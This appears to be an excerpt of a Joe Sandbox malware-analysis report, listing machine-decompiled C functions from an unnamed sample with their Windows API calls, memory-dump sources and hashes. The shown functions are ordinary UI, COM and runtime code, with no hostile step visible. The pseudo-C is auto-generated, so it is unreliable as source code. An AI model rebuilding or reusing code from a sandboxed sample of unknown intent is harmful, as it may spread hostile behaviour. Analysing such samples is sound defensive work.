				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				E00C9ACF3(__ebx, _t40 - 0x10, _t34, _t45, 0x80); // executed
				_push( *((intOrPtr*)(_t40 - 0x10)));
				_t20 = E00C99AD6(__ebx, __edi, __esi, _t45); // executed
				E00C9820F(_t40 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0xc));
				_t36 = _t40;
				_pop(_t39);
				_t25 = 4;
				return E00D0071A(_t20, _t25, _t40[0x104] ^ _t40, _t34, _t36, _t39);
			}














                                                                                                                                                                                          0x00c9ae8b
                                                                                                                                                                                          0x00c9ae8b
                                                                                                                                                                                          0x00c9ae92
                                                                                                                                                                                          0x00c9ae96
                                                                                                                                                                                          0x00c9ae9d
                                                                                                                                                                                          0x00c9aeaa
                                                                                                                                                                                          0x00c9aeba
                                                                                                                                                                                          0x00c9aec0
                                                                                                                                                                                          0x00c9aec5
                                                                                                                                                                                          0x00c9aec8
                                                                                                                                                                                          0x00c9aed4
                                                                                                                                                                                          0x00c9aed9
                                                                                                                                                                                          0x00c9aee0
                                                                                                                                                                                          0x00c9aeec
                                                                                                                                                                                          0x00c9aef6
                                                                                                                                                                                          0x00c9aefe
                                                                                                                                                                                          0x00c9aeff
                                                                                                                                                                                          0x00c9af00
                                                                                                                                                                                          0x00c9af15

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C9AEAA
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000004), ref: 00C9AEBA
                                                                                                                                                                                            • Part of subcall function 00C99AD6: __EH_prolog3_catch.LIBCMT ref: 00C99ADD
                                                                                                                                                                                            • Part of subcall function 00C9820F: InterlockedDecrement.KERNEL32 ref: 00C98223
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DecrementFileH_prolog3H_prolog3_catchInterlockedModuleName
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3556982439-0
                                                                                                                                                                                          • Opcode ID: dde9a9c2e8c0dafc4b15b9789385a3bbddc02a86968e3b009c45f1c94a961f74
                                                                                                                                                                                          • Instruction ID: 0e6d0df7a5db87bebbd9e3d60915eb1fa0ee3358031d067dd1c04b0e652a6f4a
                                                                                                                                                                                          • Opcode Fuzzy Hash: dde9a9c2e8c0dafc4b15b9789385a3bbddc02a86968e3b009c45f1c94a961f74
                                                                                                                                                                                          • Instruction Fuzzy Hash: 880184756043089FDB14EFA4EC46BED73B4FB04310F00452AE925D73C1DB746608CA61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C97412 Relevance: 3.0, APIs: 2, Instructions: 31comCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CLSIDFromProgID.OLE32(?,?), ref: 00C97431
                                                                                                                                                                                          • CoCreateInstance.OLE32(?,?,?,00D3A8B0), ref: 00C97449
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFromInstanceProg
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2151042543-0
                                                                                                                                                                                          • Opcode ID: 8c79e19953e2aeaa637d0cdfd362cc4fbfe2d8fae6234afcbf6a3c7898e41677
                                                                                                                                                                                          • Instruction ID: cb3e92054f7615cd9a5418791fbfb0eef558c2af79015f542385a7158794d018
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c79e19953e2aeaa637d0cdfd362cc4fbfe2d8fae6234afcbf6a3c7898e41677
                                                                                                                                                                                          • Instruction Fuzzy Hash: 87F01272601209BB8B00DFA9DD49EDF7BBCEB45710B00401AF905E3250DA74EA05CB72
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9B7F5 Relevance: 3.0, APIs: 2, Instructions: 25stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                          			E00C9B7F5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t12;
				intOrPtr _t17;
				void* _t21;
				void* _t25;

				_t21 = __edx;
				_push(4);
				E00D0155A(0xd3016b, __ebx, __edi, __esi);
				_t12 = 0;
				 *((intOrPtr*)(_t25 - 0x10)) = 0;
				_t24 =  *((intOrPtr*)(_t25 + 8));
				_t17 =  *0xd5d01c; // 0xd5d014
				 *((intOrPtr*)( *((intOrPtr*)(_t25 + 8)))) = _t17;
				 *((intOrPtr*)(_t25 - 4)) = 0;
				 *((intOrPtr*)(_t25 - 0x10)) = 1;
				if( *(_t25 + 0x10) != 0) {
					_t12 = lstrlenW( *(_t25 + 0x10));
				}
				E00C982AD(_t24, _t21,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t25 + 0xc)))) - 8)),  *((intOrPtr*)( *((intOrPtr*)(_t25 + 0xc)))), _t12,  *(_t25 + 0x10)); // executed
				return E00D01632(_t24);
			}







                                                                                                                                                                                          0x00c9b7f5
                                                                                                                                                                                          0x00c9b7f5
                                                                                                                                                                                          0x00c9b7fc
                                                                                                                                                                                          0x00c9b801
                                                                                                                                                                                          0x00c9b803
                                                                                                                                                                                          0x00c9b806
                                                                                                                                                                                          0x00c9b809
                                                                                                                                                                                          0x00c9b80f
                                                                                                                                                                                          0x00c9b811
                                                                                                                                                                                          0x00c9b814
                                                                                                                                                                                          0x00c9b81e
                                                                                                                                                                                          0x00c9b823
                                                                                                                                                                                          0x00c9b823
                                                                                                                                                                                          0x00c9b838
                                                                                                                                                                                          0x00c9b844

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C9B7FC
                                                                                                                                                                                          • lstrlenW.KERNEL32(00000001,?,?,?,?,00000004), ref: 00C9B823
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prolog3lstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3073243474-0
                                                                                                                                                                                          • Opcode ID: 4094e16c89d9cc9ce84a1f4f2691f02bf9502dce7cf1e4caaea79695f7f1e0b5
                                                                                                                                                                                          • Instruction ID: b4167c95fe14c6190374cb982b357a8839e71659fde5b5f98c9bbf5fc3f7a6c4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4094e16c89d9cc9ce84a1f4f2691f02bf9502dce7cf1e4caaea79695f7f1e0b5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 56F0B2B8600759AFCF14DF64CC14AAEBBA1FB48310F004429E85997390CB719A50DBA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9AAD3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00C9AAD3(void* __ecx) {
				long _v4;
				struct HWND__* _v8;
				struct HWND__* _t6;
				void* _t10;

				_t10 = __ecx;
				_t9 = __ecx + 0x14;
				if(E00C97725(__ecx + 0x14, 0, 0) != 0) {
					E00C996F9(_t9, 0xd67638, _t10 + 8, _t10);
					_t6 = CreateDialogParamW( *0xd675fc, 0x81, _v8, E00C9AA79, _v4); // executed
					return _t6;
				}
				SetLastError(0xe);
				return 0;
			}







                                                                                                                                                                                          0x00c9aad4
                                                                                                                                                                                          0x00c9aada
                                                                                                                                                                                          0x00c9aae4
                                                                                                                                                                                          0x00c9aafc
                                                                                                                                                                                          0x00c9ab19
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9ab19
                                                                                                                                                                                          0x00c9aae8
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetLastError.KERNEL32(0000000E), ref: 00C9AAE8
                                                                                                                                                                                          • CreateDialogParamW.USER32 ref: 00C9AB19
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateDialogErrorLastParam
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3445605341-0
                                                                                                                                                                                          • Opcode ID: 68317baf70bca7f55ff6a24c68ae4b299266d77f2aaeb87148b93f51a034908e
                                                                                                                                                                                          • Instruction ID: 5e6195542dbb4d38ec4efaab00aaf9853ca65b61614a3c99f68a0de620b249b3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 68317baf70bca7f55ff6a24c68ae4b299266d77f2aaeb87148b93f51a034908e
                                                                                                                                                                                          • Instruction Fuzzy Hash: D0E0D831644312BBDB5097B8DC0EFD73658BF04701F004415B585E40E0EEE15814EBF2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CB6B6A Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                          			E00CB6B6A(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t13;

				_t13 = _a4;
				if(_a8 == 0) {
					ShowWindow( *(_t13 - 0x76), 0); // executed
					if( *((intOrPtr*)(_t13 + 0x664)) != 0) {
						_push(1);
						goto L4;
					}
				} else {
					ShowWindow( *(_t13 - 0x76), 5); // executed
					_push(0);
					L4:
					_t6 = _t13 - 0x7a; // -122
					E00CB6A05(_t6);
				}
				return 1;
			}




                                                                                                                                                                                          0x00cb6b70
                                                                                                                                                                                          0x00cb6b74
                                                                                                                                                                                          0x00cb6b8a
                                                                                                                                                                                          0x00cb6b97
                                                                                                                                                                                          0x00cb6b99
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cb6b99
                                                                                                                                                                                          0x00cb6b76
                                                                                                                                                                                          0x00cb6b7b
                                                                                                                                                                                          0x00cb6b81
                                                                                                                                                                                          0x00cb6b9b
                                                                                                                                                                                          0x00cb6b9b
                                                                                                                                                                                          0x00cb6b9e
                                                                                                                                                                                          0x00cb6b9e
                                                                                                                                                                                          0x00cb6ba7

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ShowWindow.USER32(?,00000005,00D6652C,00C9B05E,?), ref: 00CB6B7B
                                                                                                                                                                                          • ShowWindow.USER32(?,00000000,00D6652C,00C9B05E,?), ref: 00CB6B8A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ShowWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1268545403-0
                                                                                                                                                                                          • Opcode ID: 0dfab30ad5d96d31bd4afdba91ba671e716be63b1753a7bc25ad775d18cd9fa6
                                                                                                                                                                                          • Instruction ID: ab30460ee8c999f9714e6fffd60c7b3e17a3ba5b217800428fdac407490552fc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0dfab30ad5d96d31bd4afdba91ba671e716be63b1753a7bc25ad775d18cd9fa6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FE01A32245700BBE6219B24DC0AFDAB7A4AB40301F90482DF1C2E60E0E7B52840EA11
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00D0A5ED Relevance: 3.0, APIs: 2, Instructions: 19COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00D0A5ED(void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t8;
				void* _t12;
				void* _t20;
				void* _t21;

				_t21 = __eflags;
				E00D009BC(_t12, __edi, __esi);
				_t8 = E00D10D0C(_t12, _t21);
				_t1 = _t20 - 4;
				 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
				E00D0A5B0( *((intOrPtr*)(_t8 + 0x54))( *((intOrPtr*)(_t8 + 0x58)), 0xd58d78, 0xc)); // executed
				_t10 =  *((intOrPtr*)(_t20 - 0x14));
				_t14 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t20 - 0x14))))));
				 *((intOrPtr*)(_t20 - 0x1c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t20 - 0x14))))));
				return E00D1743F(_t12, __edx,  *_t1, _t14, _t10);
			}







                                                                                                                                                                                          0x00d0a5ed
                                                                                                                                                                                          0x00d0a5f4
                                                                                                                                                                                          0x00d0a5f9
                                                                                                                                                                                          0x00d0a5fe
                                                                                                                                                                                          0x00d0a5fe
                                                                                                                                                                                          0x00d0a609
                                                                                                                                                                                          0x00d0a60e
                                                                                                                                                                                          0x00d0a613
                                                                                                                                                                                          0x00d0a615
                                                                                                                                                                                          0x00d0a621

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __getptd.LIBCMT ref: 00D0A5F9
                                                                                                                                                                                            • Part of subcall function 00D10D0C: __getptd_noexit.LIBCMT ref: 00D10D0F
                                                                                                                                                                                            • Part of subcall function 00D10D0C: __amsg_exit.LIBCMT ref: 00D10D1C
                                                                                                                                                                                            • Part of subcall function 00D0A5B0: __IsNonwritableInCurrentImage.LIBCMT ref: 00D0A5C3
                                                                                                                                                                                            • Part of subcall function 00D0A5B0: __getptd_noexit.LIBCMT ref: 00D0A5D3
                                                                                                                                                                                            • Part of subcall function 00D0A5B0: __freeptd.LIBCMT ref: 00D0A5DD
                                                                                                                                                                                            • Part of subcall function 00D0A5B0: ExitThread.KERNEL32 ref: 00D0A5E6
                                                                                                                                                                                          • __XcptFilter.LIBCMT ref: 00D0A61A
                                                                                                                                                                                            • Part of subcall function 00D1743F: __getptd_noexit.LIBCMT ref: 00D17447
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __getptd_noexit$CurrentExitFilterImageNonwritableThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 393088965-0
                                                                                                                                                                                          • Opcode ID: 99634c63f9e4e88fb3cbc3e00ef599d8dcf74411f092bae541d4f40de1c94120
                                                                                                                                                                                          • Instruction ID: 6b5c7f9b2b0032fbfc3dbd8b10f621f9e565c7d57bcdc0193296f5157243d451
                                                                                                                                                                                          • Opcode Fuzzy Hash: 99634c63f9e4e88fb3cbc3e00ef599d8dcf74411f092bae541d4f40de1c94120
                                                                                                                                                                                          • Instruction Fuzzy Hash: 30E0ECB1940704AFEB08BBA0D94AF6E7B75EF44311F204049F5056B2E2CE75A9849A71
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CDE234 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                                                                          			E00CDE234(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t100;
				intOrPtr _t101;
				intOrPtr* _t103;
				intOrPtr _t104;
				intOrPtr _t112;
				void* _t117;
				void* _t121;
				intOrPtr* _t165;
				void* _t166;
				void* _t167;

				_t167 = __eflags;
				_t126 = __ebx;
				_push(8);
				E00D0155A(0xd36377, __ebx, __edi, __esi);
				_t165 = __ecx;
				 *((intOrPtr*)(_t166 - 0x14)) = __ecx;
				E00CDD7E5(__ebx, __ecx, __edi, __ecx, _t167);
				 *((intOrPtr*)(_t166 - 4)) = 0;
				 *_t165 = 0xd41358;
				 *((intOrPtr*)(_t165 + 0x20)) = 0xd41348;
				 *((intOrPtr*)(_t165 + 0x72)) = 0xd4131c;
				E00CD19D3(__ebx, _t165 + 0xc2, 0, _t165, 0);
				 *((char*)(_t166 - 4)) = 1;
				E00CD19D3(_t126, _t165 + 0x19a, 0, _t165, 0);
				 *((char*)(_t166 - 4)) = 2;
				E00CD19D3(_t126, _t165 + 0x272, 0, _t165, 0);
				 *((char*)(_t166 - 4)) = 3;
				E00CD19D3(_t126, _t165 + 0x34a, 0, _t165, 0);
				 *((char*)(_t166 - 4)) = 4;
				E00CD19D3(_t126, _t165 + 0x422, 0, _t165, 0);
				 *((char*)(_t166 - 4)) = 5;
				E00CD19D3(_t126, _t165 + 0x506, 0, _t165, 0);
				 *((char*)(_t166 - 4)) = 6;
				E00CD19D3(_t126, _t165 + 0x5de, 0, _t165, 0);
				 *((char*)(_t166 - 4)) = 7;
				E00CE91F1(_t165 + 0x6b6, 0, _t165, 0);
				 *((char*)(_t166 - 4)) = 8;
				E00CE91F1(_t165 + 0x6cf, 0, _t165, 0);
				 *((char*)(_t166 - 4)) = 9;
				E00CE91F1(_t165 + 0x6e8, 0, _t165, 0);
				 *((char*)(_t166 - 4)) = 0xa;
				E00CE91F1(_t165 + 0x701, 0, _t165, 0);
				 *((char*)(_t166 - 4)) = 0xb;
				E00CE91F1(_t165 + 0x71a, 0, _t165, 0);
				 *((char*)(_t166 - 4)) = 0xc;
				E00CE91F1(_t165 + 0x733, 0, _t165, 0);
				 *((char*)(_t166 - 4)) = 0xd;
				E00CE91F1(_t165 + 0x74c, 0, _t165, 0);
				_t100 =  *0xd5d01c; // 0xd5d014
				_t127 = _t165 + 0x765;
				 *((intOrPtr*)(_t165 + 0x765)) = _t100;
				_t101 =  *0xd5d01c; // 0xd5d014
				 *((intOrPtr*)(_t165 + 0x769)) = _t101;
				 *((char*)(_t166 - 4)) = 0x10;
				E00CCCA19(_t165 + 0x765, _t165 + 0x775, 0, _t165, 0);
				_t103 = _t165 + 0x848;
				 *_t103 = 0;
				 *((intOrPtr*)(_t103 + 4)) = 0;
				 *((intOrPtr*)(_t103 + 8)) = 0;
				 *((intOrPtr*)(_t103 + 0xc)) = 0;
				_t104 =  *0xd5d01c; // 0xd5d014
				 *((intOrPtr*)(_t165 + 0x860)) = _t104;
				 *((char*)(_t166 - 4)) = 0x12;
				E00CE91F1(_t165 + 0x868, 0, _t165, 0);
				 *((char*)(_t166 - 4)) = 0x13;
				E00CD2AD7(_t165 + 0x885, 0);
				 *((char*)(_t166 - 4)) = 0x14;
				E00CD19D3(_t127, _t165 + 0x90b, 0, _t165, 0);
				 *((char*)(_t166 - 4)) = 0x15;
				E00CD2AD7(_t165 + 0x9e3, 0);
				 *((char*)(_t166 - 4)) = 0x16;
				E00CD19D3(_t127, _t165 + 0xa69, 0, _t165, 0);
				 *((char*)(_t166 - 4)) = 0x17;
				E00CD19D3(_t127, _t165 + 0xb41, 0, _t165, 0);
				 *((char*)(_t166 - 4)) = 0x18;
				E00CCEBB5(_t165 + 0xc1d, 0);
				_t112 =  *0xd5d01c; // 0xd5d014
				 *((intOrPtr*)(_t165 + 0xc56)) = _t112;
				 *((intOrPtr*)(_t165 + 0xc5a)) = 0;
				 *((char*)(_t166 - 4)) = 0x1b;
				E00CD2AD7(_t165 + 0xc5e, 0);
				 *((char*)(_t166 - 4)) = 0x1c;
				E00CD2AD7(_t165 + 0xce4, 0);
				 *((char*)(_t166 - 4)) = 0x1d;
				E00CD2AD7(_t165 + 0xd6a, 0);
				 *((char*)(_t166 - 4)) = 0x1e;
				 *((intOrPtr*)(_t165 + 0x85c)) = 0;
				 *((intOrPtr*)(_t165 + 0x864)) = 0;
				 *((intOrPtr*)(_t165 + 0x771)) = 0;
				 *((intOrPtr*)(_t165 + 0x76d)) = 0;
				 *((intOrPtr*)(_t165 + 0x881)) = 0;
				 *((intOrPtr*)(_t165 + 0x96)) = 0;
				_t117 = E00CD53B7(_t165 + 0xd6a, _t166 - 0x10, 0xab); // executed
				 *((char*)(_t166 - 4)) = 0x1f;
				E00C9CCC5(_t127, _t166, _t117);
				 *((char*)(_t166 - 4)) = 0x1e;
				E00C9820F(_t166 - 0x10);
				_t121 = E00CD53B7(_t166 - 0x10, _t166 - 0x10, 0xac);
				 *((char*)(_t166 - 4)) = 0x20;
				E00C9CCC5(_t165 + 0x769, _t166, _t121);
				E00C9820F(_t166 - 0x10);
				 *((intOrPtr*)(_t165 + 0xdf0)) = 0;
				 *((intOrPtr*)(_t165 + 0xdf4)) = 0;
				 *((intOrPtr*)(_t165 + 0x4fa)) = 0;
				 *((intOrPtr*)(_t165 + 0x4fe)) = 0;
				 *((intOrPtr*)(_t165 + 0x502)) = 0;
				return E00D01632(_t165);
			}













                                                                                                                                                                                          0x00cde234
                                                                                                                                                                                          0x00cde234
                                                                                                                                                                                          0x00cde234
                                                                                                                                                                                          0x00cde23b
                                                                                                                                                                                          0x00cde240
                                                                                                                                                                                          0x00cde242
                                                                                                                                                                                          0x00cde245
                                                                                                                                                                                          0x00cde252
                                                                                                                                                                                          0x00cde255
                                                                                                                                                                                          0x00cde25b
                                                                                                                                                                                          0x00cde262
                                                                                                                                                                                          0x00cde269
                                                                                                                                                                                          0x00cde274
                                                                                                                                                                                          0x00cde278
                                                                                                                                                                                          0x00cde283
                                                                                                                                                                                          0x00cde287
                                                                                                                                                                                          0x00cde292
                                                                                                                                                                                          0x00cde296
                                                                                                                                                                                          0x00cde2a1
